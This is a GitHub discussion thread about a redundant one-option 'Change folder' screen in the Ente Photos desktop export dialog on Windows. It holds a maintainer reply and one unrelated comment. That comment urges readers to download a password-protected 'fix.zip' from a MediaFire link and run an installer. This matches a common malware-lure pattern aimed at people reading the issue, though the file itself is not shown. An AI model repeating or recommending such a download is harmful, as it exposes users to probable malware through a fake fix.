### DISCUSSION TITLE
Why need screen after three dots with only option on new screen

### DISCUSSION THREAD

**Discussion by Tuscann** [ente-io/ente#2924] [Enhancements]
### Description

1. Open desktop on Windows 10
2. Click on 3 lines
3. Click on Export Data
4. Click 3 dots after Destination
5. Opens screen with text Change folder with only one option.

**Why have screen with only one option ?**  Remove screen with only one option.

![11](https://github.com/user-attachments/assets/1a8412e4-dd4b-44d9-a646-53025b86559c)

### Version

1.7.2

### What product are you using?

Ente Photos

### What platform are you using?

Desktop - Windows

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ua741** [comment]
@Tuscann Please use discussion for UX suggestions.
